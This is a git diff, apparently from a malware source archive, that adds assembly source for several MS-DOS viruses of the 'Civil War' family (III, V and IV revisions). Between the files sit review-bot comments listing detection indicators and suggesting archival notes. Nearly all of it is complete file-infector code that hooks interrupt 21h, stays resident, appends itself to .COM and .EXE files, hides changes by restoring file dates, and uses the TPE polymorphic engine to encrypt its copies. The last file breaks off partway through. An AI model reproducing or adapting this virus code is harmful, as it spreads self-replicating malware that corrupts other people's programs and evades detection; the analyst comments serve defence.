+ +hook_int21: cli ; hook int21h + mov ax,3521h ; get old int 21h + int 21h ; vector + mov ds,cs:[v_segment+bp] + mov ds:[old_21h],bx ; old vector in memory + mov ds:[old_21h+2],es + + mov ax,ds ; INT 21, AX 2521 + mov bx,ax ; bx segment new int21 + mov dx, offset main_virus ; dx offset new int21 + xor ax,ax + mov ds,ax + mov ds:[4*21h],dx ; offset int 21h + mov ds:[4*21h+2],bx ; seggment int 21h + + sti + +abort: pop es + pop ds + retf ; continu with orginal + ; programming + + +;****************************************************************************** +; +; This part of the virus will intercept the interuptvectors +; +;****************************************************************************** + + +main_virus: + pushf + cmp ah,0a0h ; check if virus ask + jne new_21h ; for virus_id + mov ax,0003h ; returns virus_id + popf + iret + +new_21h: push ax + push bx + push cx + push dx + push ds + push es + push di + push sp + push bp + +chk_open: cmp ah,3dh ; check if a file is + je chk_com ; opened + +chk_exec: cmp ax,4b00h ; check if a file is + je chk_com ; executed + +continu: pop bp + pop sp + pop di + pop es ; recover registers + pop ds + pop dx + pop cx + pop bx + pop ax + popf + jmp dword ptr cs:[old_21h] + +;****************************************************************************** + + + + +chk_com: mov cs:[name_seg],ds ; ds:dx = filename + mov cs:[name_off],dx + + ; check if extension + cld ; is .COM + mov di,dx + push ds + pop es + mov al,'.' 
+ repne scasb + cmp word ptr es:[di],'OC' + jne chk_exe + cmp byte ptr es:[di+2],'M' + jne continu + + jmp infect_com + +chk_exe: cmp word ptr es:[di],'XE' ; check if extension + jne continu ; is .EXE + cmp byte ptr es:[di+2],'E' + jne continu + +;****************************************************************************** +; +; This part will infect a EXE file +; +;****************************************************************************** + +infect_exe: mov cs:[host_file],0Eh ; EXE marker + call int24h + call open_file ; open file + jc close_file ; Error? + call set_atributes + call get_date ; get file date/time + call chk_infect ; check if already + ; infect + + je close_file + + mov ax,4200h ; go to filestart + call mov_point + mov ah,3fh ; read exe header + mov cx,18h + lea dx,[head_buffer] ; store header in + call do_int21h ; HEAD_BUFFER + + call EXE_inf ; call for infection + ; of EXE file + + call save_date + jmp close_file + +;****************************************************************************** +; +; This part will infect COM files +; +;****************************************************************************** + +infect_com: mov cs:[host_file],0Ch ; COM marker + call int24h + call open_file ; open file + jc close_file ; error? 
+ call set_atributes + call get_date ; get file date/time + call chk_infect ; check if already + ; infect + + + + je close_file ; already infected + + mov ax,4200h ; get beginning of file + call mov_point + + mov ah,3fh + mov cx,03h + push cs + pop ds + lea dx,[host_begin] + call do_int21h + + + mov ax,4200h ; get file lenght + call mov_point + + mov ax,4202h + call mov_point + sub ax,03h ; subtract 3 bytes for + mov cs:[lenght_file],ax ; jump instruction + ; later + + call write_jmp ; write jmp instruction + call write_vir ; write virus + call save_date + +close_file: mov bx,cs:[handle] ; close file + mov ah,3eh + call do_int21h + +restore_int24h: mov dx,cs:[old_24h] ; restore int 24h + mov ds,cs:[old_24h+2] + mov ax,2524h + call do_int21h + jmp continu ; continu with + ; interrupt + +new_24h: mov al,3 + iret + +;****************************************************************************** +; +; Procedure's used in the virus +; +;****************************************************************************** + +int24h: push cs + pop ds + mov ax,3524h ; hook int24h + call do_int21h + mov cs:[old_24h],bx + mov cs:[old_24h+2],es + mov dx,offset new_24h + mov ax,2524h + call do_int21h + ret + +set_atributes: mov ax,4300h ; clear file + mov ds,cs:[name_seg] ; atributes + mov dx,cs:[name_off] + call do_int21h + and cl,0feh + mov ax,4301h + call do_int21h + ret + +get_date: mov ax,5700h ; get original + call do_int21h ; time and date + mov cs:[date],dx ; of file + mov cs:[time],cx + ret + +save_date: mov bx,cs:[handle] + mov dx,cs:[date] + mov cx,cs:[time] + mov ax,5701h + call do_int21h + ret + +open_file: mov ds,cs:[name_seg] ; open file + mov dx,cs:[name_off] ; with pointer to + mov ax,3d02h ; name in ds:dx + call do_int21h + mov cs:[handle],ax + mov bx,ax + ret + +chk_infect: push cs + pop ds + mov ax,4202h ; file-pointer + xor cx,cx ; to infection marker + sub cx,01h + xor dx,dx + sub dx,02h + mov bx,[handle] + call do_int21h + + mov ah,3f + mov cx,02h + lea 
dx,[file_id] + call do_int21h + + mov al, byte ptr cs:[file_id] + mov ah, byte ptr cs:[file_id]+1 + cmp ax,[id_marker] + ret + + +mov_point: push cs + pop ds + mov bx,cs:[handle] ; move filepointer + xor cx,cx + xor dx,dx + call cs:do_int21h + ret + + +write_jmp: push cs + pop ds + mov ax,4200h ; write JUMP + call mov_point ; instruction + mov ah,40h ; at begin of file + mov cx,01h + lea dx,cs:[jump] + call do_int21h + + mov ah,40h ; write offset + mov cx,02h ; for JUMP + lea dx,cs:[lenght_file] + call do_int21h + ret + +write_vir: push cs + pop ds + mov ax,4202h ; write actual + call mov_point ; virus at end of + mov ah,40h ; file + mov cx,lenght + mov dx,103h + call do_int21h + ret + +EXE_inf: mov ax,word ptr cs:[head_buffer+14h] ; store old IP + mov cs:[old_ip],ax + mov ax,word ptr cs:[head_buffer+16h] ; store old CS + mov cs:[old_cs],ax + +new_CS_IP: mov ax,4200h ; get filelenght + call mov_point + mov ax,4202h + call mov_point + mov bx,10h ; divide filelenght + div bx ; by 16 + sub ax,word ptr cs:[head_buffer+08h] + mov cs:[new_cs],ax ; store new CS + mov cs:[new_ip],dx ; store new IP + call write_vir ; write virus to end + ; of file +new_size: mov ax,4200h ; Get new filesize + call mov_point ; and calculate + mov ax,4202h ; PAGE and OFFSET + call mov_point ; size for in the + mov bx,0200h ; EXE buffer. 
+ div bx + cmp dx,0000h + jne niet_nul + jmp doorgaan +niet_nul: inc ax +doorgaan: mov word ptr cs:[head_buffer+02h],dx ; new mod lengh + mov word ptr cs:[head_buffer+04h],ax ; new page lenght + mov ax,cs:[new_ip] + mov word ptr cs:[head_buffer+14h],ax ; new IP + mov ax,cs:[new_cs] + mov word ptr cs:[head_buffer+16h],ax ; new CS + + mov word ptr cs:[head_buffer+0E],ax ; new SS + mov word ptr cs:[head_buffer+10],1000 ; new SP + + mov ax,4200h + call mov_point + mov ah,40h ; write new + mov bx,cs:[handle] ; EXE header + mov cx,18h + lea dx,cs:[head_buffer] + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h] + ret + +;****************************************************************************** +; +; D A T A +; +;****************************************************************************** + +v_name db "Civil War III v1.0, (c) Dec 1992, [ DH / TridenT] " +old_21h dw 00h,00h +old_24h dw 00h,00h +host_file db 0Ch +host_begin db 90h,0cdh,20h +jump db 0e9h +name_seg dw ? +name_off dw ? +v_segment dw ? +handle dw ? +lenght_file dw ? +date dw ? +time dw ? +head_buffer db 18 dup (?) +file_id dw 0000 +old_cs dw ? +old_ip dw ? +new_cs dw ? +new_ip dw ? +Id_Marker dw "GR" +last dw "GR" +civ_war ends + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil510.asm b/MSDOS/Virus.MSDOS.Unknown.civil510.asm new file mode 100644 index 00000000..634cbdb4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil510.asm 
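Review bot: `hook_int21` installs the INT 21h hook by writing the vector table directly (`mov ds:[4*21h],dx` / `mov ds:[4*21h+2],bx`) instead of calling DOS function 25h, and the file does not point this out; a comment `; INT 21h hooked by direct IVT write, not DOS 25h` is worth adding, since an IVT-integrity check rather than a function-25h monitor is what observes this variant. The other indicators visible here: a private INT 21h AH=0A0h call answered with AX=0003h, the marker `GR` as the last two bytes of an infected file (`chk_infect` seeks to EOF-2 and compares against `Id_Marker`, which is the final word written because `lenght` stops at `last`), .COM and .EXE infection distinguished by `host_file` = 0Ch or 0Eh, and for EXEs a rewritten header with CS:IP pointing at the appended code, SS set to the new CS and SP to 1000h. The plain-text `v_name` string ("Civil War III v1.0, (c) Dec 1992, [ DH / TridenT]") lies inside the copied range and so lands in every infected file, which makes it the simplest static signature.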
@@ -0,0 +1,337 @@ +;**************************************************************************** +; Civil War V V1.0 * +; * +; Assembled with Tasm 2.5 * +; (c) Jan '93 [ Dark Helmet / TridenT ], The Netherlands * +; * +;**************************************************************************** +; * +; This is an example virus for the TPE engine. * +; We are not responsible if you use the TPE in an illegal or naughty way. * +; The TridenT Polymorpic Engine version 1.3 should be used for linking * +; with this virus. * +; * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + org 100h + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + +len equ offset tpe_top - begin + + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,offset virus ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. 
+ cmp ax,0008h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,200h ; by X kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],200h + +install_virus: call RND_init + + mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0008h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' 
; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + +own_stack: cli + mov cs:[old_sp-6],sp + mov cs:[old_ss-6],ss + mov ax,cs + add ax,150h + mov ss,ax + mov sp,100h + sti + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + + mov cs:[handle-6],ax + mov bx,ax + + call get_date + +check_infect: mov bx,cs:[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,cs:[carrier_begin-6] + call do_int21h + + push cs + pop ds + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,cs:[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov cs:[lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: mov bx,cs:[handle-6] + mov dx,cs:[date-6] + mov cx,cs:[time-6] + mov ax,5701h + call do_int21h + + +close_file: mov bx,cs:[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + +restore_stack: cli + mov sp,cs:[old_sp-6] + mov ss,cs:[old_ss-6] + sti + + + jmp continu + + + +new_24h: mov al,03h + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: mov ax,4200h ; goto begin of file + call move_pointer + + mov ah,40h ; write JMP instruction + mov cx,01h + lea dx,[jump-6] + call do_int21h + + mov ah,40h ; write JMP offset + mov 
cx,02h + lea dx,[lenght_file-6] + call do_int21h + + mov ah,40h ; write initials + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: mov ax,4202h ;goto end of file + call move_pointer + +TPE_engine: mov ax,cs ;ES points to + add ax,90h ;worksegment + mov es,ax + + push cs ;DS:DX code to encrypt + pop ds + mov dx,100h + + mov bp,[lenght_file-6] ;BP start of encryptor + add bp,103h + + mov cx,len ;lenght code to encrypt + + xor si,si ;distance encryptor/ + ;decryptor = 0 + + call rnd_get ;AX = type of + call crypt ;encryption + + mov bx,cs:[handle-6] ;write virus + mov ah,40h ;at end of file + call do_int21h + ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h ; hook int 24h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +virus_name db "Civil War V v1.0, (c) Jan '92" +old_21h dw 00h,00h +old_24h dw 00h,00h +old_ss dw ? +old_sp dw ? +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +writer db "[ DH / TridenT ]" + + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4a.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4a.asm new file mode 100644 index 00000000..5dad729f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil_4a.asm 
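Review bot: The identification string at `virus_name db "Civil War V v1.0, (c) Jan '92"` contradicts the header, which dates the sample Jan '93 and ties it to TPE 1.3; this embedded string is what string-based triage will surface, so an archival comment beside the data line noting the discrepancy would stop the sample being misdated. The `-6` applied to every data reference in the resident handler is never explained: `install_virus` copies from `begin` (six bytes past `dummy`) to offset 0100h, so a comment such as `; resident copy starts at begin, not dummy: handler-side offsets are label-6` at `install_virus` would make the handler readable. The `check_resident` handshake (`mov ah,0a0h` / `cmp ax,0008h`) and the 'DH' marker bytes compared in `check_infect` are the observable characteristics an analyst needs and are likewise undocumented in the header.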
@@ -0,0 +1,190 @@
+;****************************************************************************
+;* Civil War IV *
+;* *
+;* Assembled with Tasm 2.5 *
+;* *
+;* (c) Jan '93 Dark Helmet, The Netherlands. *
+;* The author takes no responsibilty for any damages caused by the virus *
+;* *
+;* Example virus with the TPE engine (TPE version 1.3). *
+;* Use : TASM CIVIL_4A *
+;* TLINK CIVIL_4A TPE *
+;* *
+;*--------------------------------------------------------------------------*
+;* *
+;* This virus is NOT dedicated to Sara Gordon, but to all the innocent *
+;* people who are killed in Yugoslavia. *
+;* *
+;* The text in the virus is taken from the song Civil War (hence the name) *
+;* of Guns and Roses, Use Your Illusion II, we hope they don't mind it. *
+;* *
+;* The first name for the virus was NAVIGATOR II, because the virus is *
+;* based on the NAVIGATOR virus (also written by me, a while back), but *
+;* since I decided to put the songtext in it I renamed it to Civil War IV *
+;* *
+;****************************************************************************
+
+ .model tiny
+ .radix 16
+ .code
+
+ extrn rnd_init:near
+ extrn rnd_get:near
+ extrn crypt:near
+ extrn tpe_top:near
+
+ org 100h
+
+len equ offset tpe_top - begin
+
+Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h
+
+Begin: call virus ; calculate delta offset
+
+Virus: pop bp
+ sub bp,offset virus
+
+ mov dx,0fe00h ; DTA instellen
+ mov ah,1ah
+ int 21h
+
+Restore_begin: call rnd_init ; init random generator
+ mov di,0100h
+ lea si,ds:[buffer+bp]
+ mov cx,06h
+ rep movsb
+
+First: lea dx,[com_mask+bp] ;get first COM file
+ mov ah,04eh
+ xor cx,cx
+ int 21h
+
+Open_file: mov ax,03d02h ;open for READ/WRITE
+ mov dx,0fe1eh
+ int 21h
+ mov [handle+bp],ax
+ xchg ax,bx
+
+Read_date: mov ax,05700h ;store date/time for later
+ int 21h ;use
+ mov [date+bp],dx
+ mov [time+bp],cx
+
+Check_infect: mov bx,[handle+bp] ;check if initials present in
+ mov ah,03fh ;file
+ mov cx,06h
+ lea dx,[buffer+bp]
+ int 21h
+
+ mov al,byte ptr [buffer+bp]+3 ;Compare initials
+ mov ah,byte ptr [buffer+bp]+4
+ cmp ax,[initials+bp]
+ jne infect_file ;if initials not present
+ ;start infecting file
+
+Close_file: mov bx,[handle+bp] ;close file
+ mov ah,3eh
+ int 21h
+
+Next_file: mov ah,4fh ;get next COM file
+ int 21h ;in directorie
+ jnb open_file
+ jmp exit
+
+Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file
+ sub ax,03h
+ mov [lenght+bp],ax
+ mov ax,04200h ;goto begin of file
+ call move_pointer
+
+Write_jump: mov ah,40h ;Write JUMP intruction
+ mov cx,01h
+ lea dx,[jump+bp]
+ int 21h
+
+ mov ah,40h ;Write JUMP offset
+ mov cx,02h
+ lea dx,[lenght+bp]
+ int 21h
+
+ mov ah,40 ;Write initials to check
+ mov cx,02h ;for infection later
+ lea dx,[initials+bp]
+ int 21h
+
+ mov ax,4202h ; move to end of file
+ call move_pointer ; for infection
+
+;*****************************************************************************
+; T P E *
+;*****************************************************************************
+
+Encrypt: push bp ; BP = delta offset
+ ; push delta offset on stack
+ ; for later use.
+
+ mov ax,cs ; Calculate worksegment
+ add ax,01000h
+ mov es,ax ; ES point to decrypt virus
+
+ lea dx,[begin+bp] ; DS:DX begin encryption
+
+ mov cx,len ; virus lenght
+
+ mov bp,[lenght+bp] ; decryption starts at this
+ add bp,103h ; point
+
+ xor si,si ; distance between decryptor
+ ; and encrypted code is 0 bytes
+
+ call rnd_get ; AX = random value
+ call crypt ; encrypt virus
+
+ pop bp ; BP = delta offset
+ ; get delta offset of stack
+
+;******************************************************************************
+; T P E - E N D *
+;******************************************************************************
+
+Write_virus: mov bx,[handle+bp]
+ mov ah,40h
+ int 21h
+
+Restore_date: mov ax,05701h
+ mov bx,[handle+bp]
+ mov cx,[time+bp]
+ mov dx,[date+bp]
+ int 21h
+
+Exit: mov bx,0100h ; jump to start program
+ jmp bx
+
+;----------------------------------------------------------------------------
+
+move_pointer: mov bx,[handle+bp]
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ ret
+
+;----------------------------------------------------------------------------
+v_name db "Civil War IV, (c) 1993 "
+com_mask db "*.com",0
+handle dw ?
+date dw ?
+time dw ?
+buffer db 090h,0cdh,020h,044h,048h,00h
+initials dw 4844h
+lenght dw ?
+jump db 0e9h,0
+message db "For all i'v seen has changed my mind"
+ db "But still the wars go on as the years go by"
+ db "With no love of God or human rights"
+ db "'Cause all these dreams are swept aside"
+ db "By bloody hands of the hypnotized"
+ db "Who carry the cross of homicide"
+ db "And history bears the scars of our Civil Wars."
+writer db "[ DH / TridenT ]",00
+
+ end dummy
diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4b.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4b.asm
new file mode 100644
index 00000000..b3da73c2
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.civil_4b.asm
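Review bot: The four Civil War IV revisions (this hunk and the civil_4b, civil_4c and civil_4d hunks that follow) are near-identical, and their headers only change the version number, so the archive never records what each revision altered; from the text, civil_4b's `Exit` restores DS/ES before the jump, civil_4c adds `call rnd_get` at `Open_file`, and civil_4d closes the handle after `Restore_date`. A one-line archival note in each header, e.g. `;* Archive note: differs from civil_4a in ... *`, would let an analyst pick the right sample without diffing all four. A point of style in `Write_jump`: `mov ah,40` sits beside `mov ah,40h` for the same function number and is only correct because of `.radix 16` at the top of the file; an analyst lifting the snippet into a decimal-radix listing would misread it.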
@@ -0,0 +1,196 @@
+;****************************************************************************
+;* Civil War IV v1.1 (minor bugfix version) *
+;* *
+;* Assembled with Tasm 2.5 *
+;* *
+;* (c) 08-01-93 Dark Helmet, The Netherlands. *
+;* The author takes no responsibilty for any damages caused by the virus *
+;* *
+;* This is a example virus with the TPE engine to teach you how to use *
+;* the TPE engine. *
+;* *
+;*--------------------------------------------------------------------------*
+;* *
+;* Notes: *
+;* *
+;* This virus is NOT dedicated to Sara Gordon, but to all the innocent *
+;* people who are killed in Yugoslavia. *
+;* *
+;* The text in the virus is taken from the song Civil War (hence the name) *
+;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. *
+;* *
+;* The first name for the virus was NAVIGATOR II, because the virus is *
+;* based on the NAVIGATOR virus (also written by me, a while back), but *
+;* since I decided to put the songtext in it I renamed it to Civil War IV *
+;* *
+;* You need the TPE 1.3 engine to link this program. * *
+;* *
+;****************************************************************************
+
+ .model tiny
+ .radix 16
+ .code
+
+ extrn rnd_init:near
+ extrn rnd_get:near
+ extrn crypt:near
+ extrn tpe_top:near
+
+ org 100h
+
+len equ offset tpe_top - begin
+
+Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h
+
+Begin: call virus ; calculate delta offset
+
+Virus: pop bp
+ sub bp,offset virus
+
+ mov dx,0fe00h ; DTA instellen
+ mov ah,1ah
+ int 21h
+
+Restore_begin: call rnd_init ; init random generator
+ mov di,0100h
+ lea si,ds:[buffer+bp]
+ mov cx,06h
+ rep movsb
+
+First: lea dx,[com_mask+bp] ;get first COM file
+ mov ah,04eh
+ xor cx,cx
+ int 21h
+
+Open_file: mov ax,03d02h ;open for READ/WRITE
+ mov dx,0fe1eh
+ int 21h
+ mov [handle+bp],ax
+ xchg ax,bx
+
+Read_date: mov ax,05700h ;store date/time for later
+ int 21h ;use
+ mov [date+bp],dx
+ mov [time+bp],cx
+
+Check_infect: mov bx,[handle+bp] ;check if initials present in
+ mov ah,03fh ;file
+ mov cx,06h
+ lea dx,[buffer+bp]
+ int 21h
+
+ mov al,byte ptr [buffer+bp]+3 ;Compare initials
+ mov ah,byte ptr [buffer+bp]+4
+ cmp ax,[initials+bp]
+ jne infect_file ;if initials not present
+ ;start infecting file
+
+Close_file: mov bx,[handle+bp] ;close file
+ mov ah,3eh
+ int 21h
+
+Next_file: mov ah,4fh ;get next COM file
+ int 21h ;in directorie
+ jnb open_file
+ jmp exit
+
+Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file
+ sub ax,03h
+ mov [lenght+bp],ax
+ mov ax,04200h ;goto begin of file
+ call move_pointer
+
+Write_jump: mov ah,40h ;Write JUMP intruction
+ mov cx,01h
+ lea dx,[jump+bp]
+ int 21h
+
+ mov ah,40h ;Write JUMP offset
+ mov cx,02h
+ lea dx,[lenght+bp]
+ int 21h
+
+ mov ah,40 ;Write initials to check
+ mov cx,02h ;for infection later
+ lea dx,[initials+bp]
+ int 21h
+
+ mov ax,4202h ; move to end of file
+ call move_pointer ; for infection
+
+;*****************************************************************************
+; T P E *
+;*****************************************************************************
+
+Encrypt: push bp ; BP = delta offset
+ ; push delta offset on stack
+ ; for later use.
+
+ mov ax,cs ; Calculate worksegment
+ add ax,01000h
+ mov es,ax ; ES point to decrypt virus
+
+ lea dx,[begin+bp] ; DS:DX begin encryption
+
+ mov cx,len ; virus lenght
+
+ mov bp,[lenght+bp] ; decryption starts at this
+ add bp,103h ; point
+
+ xor si,si ; distance between decryptor
+ ; and encrypted code is 0 bytes
+
+ call rnd_get ; AX = random value
+ call crypt ; encrypt virus
+
+ pop bp ; BP = delta offset
+ ; get delta offset of stack
+
+;******************************************************************************
+; T P E - E N D *
+;******************************************************************************
+
+Write_virus: mov bx,[handle+bp]
+ mov ah,40h
+ int 21h
+
+Restore_date: mov ax,05701h
+ mov bx,[handle+bp]
+ mov cx,[time+bp]
+ mov dx,[date+bp]
+ int 21h
+
+Exit: mov ax,cs
+ mov ds,ax
+ mov es,ax
+ mov bx,0100h ; jump to start program
+ jmp bx
+
+;----------------------------------------------------------------------------
+
+move_pointer: mov bx,[handle+bp]
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ ret
+
+;----------------------------------------------------------------------------
+v_name db "Civil War IV v1.1, (c) Jan '93 "
+com_mask db "*.com",0
+handle dw ?
+date dw ?
+time dw ?
+buffer db 090h,0cdh,020h,044h,048h,00h
+initials dw 4844h
+lenght dw ?
+jump db 0e9h,0
+message db "For all i've seen has changed my mind"
+ db "But still the wars go on as the years go by"
+ db "With no love of God or human rights"
+ db "'Cause all these dreams are swept aside"
+ db "By bloody hands of the hypnotized"
+ db "Who carry the cross of homicide"
+ db "And history bears the scars of our Civil Wars."
+writer db "[ DH / TridenT ]",00
+
+ end dummy
diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4c.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4c.asm
new file mode 100644
index 00000000..62c1efa2
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.civil_4c.asm
@@ -0,0 +1,197 @@
+;****************************************************************************
+;* Civil War IV v1.2 *
+;* *
+;* Assembled with Tasm 2.5 *
+;* *
+;* (c) Jan '93 by Dark Helmet, The Netherlands. *
+;* The author takes no responsibilty for any damages caused by the virus *
+;* *
+;* This is a example virus with the TPE engine for teaching you how to *
+;* use the TPE engine. *
+;* *
+;*--------------------------------------------------------------------------*
+;* *
+;* Notes: *
+;* *
+;* This virus is NOT dedicated to Sara Gordon, but to all the innocent *
+;* people who are killed in Yugoslavia. *
+;* *
+;* The text in the virus is taken from the song Civil War (hence the name) *
+;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. *
+;* *
+;* The first name for the virus was NAVIGATOR II, because the virus is *
+;* based on the NAVIGATOR virus (also written by me, a while back), but *
+;* since I decided to put the songtext in it I renamed it to Civil War IV *
+;* *
+;* You need the TPE 1.3 engine to link this program. * *
+;* *
+;****************************************************************************
+
+ .model tiny
+ .radix 16
+ .code
+
+ extrn rnd_init:near
+ extrn rnd_get:near
+ extrn crypt:near
+ extrn tpe_top:near
+
+ org 100h
+
+len equ offset tpe_top - begin
+
+Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h
+
+Begin: call virus ; calculate delta offset
+
+Virus: pop bp
+ sub bp,offset virus
+
+ mov dx,0fe00h ; DTA instellen
+ mov ah,1ah
+ int 21h
+
+Restore_begin: call rnd_init ; init random generator
+ mov di,0100h
+ lea si,ds:[buffer+bp]
+ mov cx,06h
+ rep movsb
+
+First: lea dx,[com_mask+bp] ;get first COM file
+ mov ah,04eh
+ xor cx,cx
+ int 21h
+
+Open_file: call rnd_get
+ mov ax,03d02h ;open for READ/WRITE
+ mov dx,0fe1eh
+ int 21h
+ mov [handle+bp],ax
+ xchg ax,bx
+
+Read_date: mov ax,05700h ;store date/time for later
+ int 21h ;use
+ mov [date+bp],dx
+ mov [time+bp],cx
+
+Check_infect: mov bx,[handle+bp] ;check if initials present in
+ mov ah,03fh ;file
+ mov cx,06h
+ lea dx,[buffer+bp]
+ int 21h
+
+ mov al,byte ptr [buffer+bp]+3 ;Compare initials
+ mov ah,byte ptr [buffer+bp]+4
+ cmp ax,[initials+bp]
+ jne infect_file ;if initials not present
+ ;start infecting file
+
+Close_file: mov bx,[handle+bp] ;close file
+ mov ah,3eh
+ int 21h
+
+Next_file: mov ah,4fh ;get next COM file
+ int 21h ;in directorie
+ jnb open_file
+ jmp exit
+
+Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file
+ sub ax,03h
+ mov [lenght+bp],ax
+ mov ax,04200h ;goto begin of file
+ call move_pointer
+
+Write_jump: mov ah,40h ;Write JUMP intruction
+ mov cx,01h
+ lea dx,[jump+bp]
+ int 21h
+
+ mov ah,40h ;Write JUMP offset
+ mov cx,02h
+ lea dx,[lenght+bp]
+ int 21h
+
+ mov ah,40 ;Write initials to check
+ mov cx,02h ;for infection later
+ lea dx,[initials+bp]
+ int 21h
+
+ mov ax,4202h ; move to end of file
+ call move_pointer ; for infection
+
+;*****************************************************************************
+; T P E *
+;*****************************************************************************
+
+Encrypt: push bp ; BP = delta offset
+ ; push delta offset on stack
+ ; for later use.
+
+ mov ax,cs ; Calculate worksegment
+ add ax,01000h
+ mov es,ax ; ES point to decrypt virus
+
+ lea dx,[begin+bp] ; DS:DX begin encryption
+
+ mov cx,len ; virus lenght
+
+ mov bp,[lenght+bp] ; decryption starts at this
+ add bp,103h ; point
+
+ xor si,si ; distance between decryptor
+ ; and encrypted code is 0 bytes
+
+ call rnd_get ; AX = random value
+ call crypt ; encrypt virus
+
+ pop bp ; BP = delta offset
+ ; get delta offset of stack
+
+;******************************************************************************
+; T P E - E N D *
+;******************************************************************************
+
+Write_virus: mov bx,[handle+bp]
+ mov ah,40h
+ int 21h
+
+Restore_date: mov ax,05701h
+ mov bx,[handle+bp]
+ mov cx,[time+bp]
+ mov dx,[date+bp]
+ int 21h
+
+Exit: mov ax,cs
+ mov ds,ax
+ mov es,ax
+ mov bx,0100h ; jump to start program
+ jmp bx
+
+;----------------------------------------------------------------------------
+
+move_pointer: mov bx,[handle+bp]
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ ret
+
+;----------------------------------------------------------------------------
+v_name db "Civil War IV v1.2, (c) Jan '93 "
+com_mask db "*.com",0
+handle dw ?
+date dw ?
+time dw ?
+buffer db 090h,0cdh,020h,044h,048h,00h
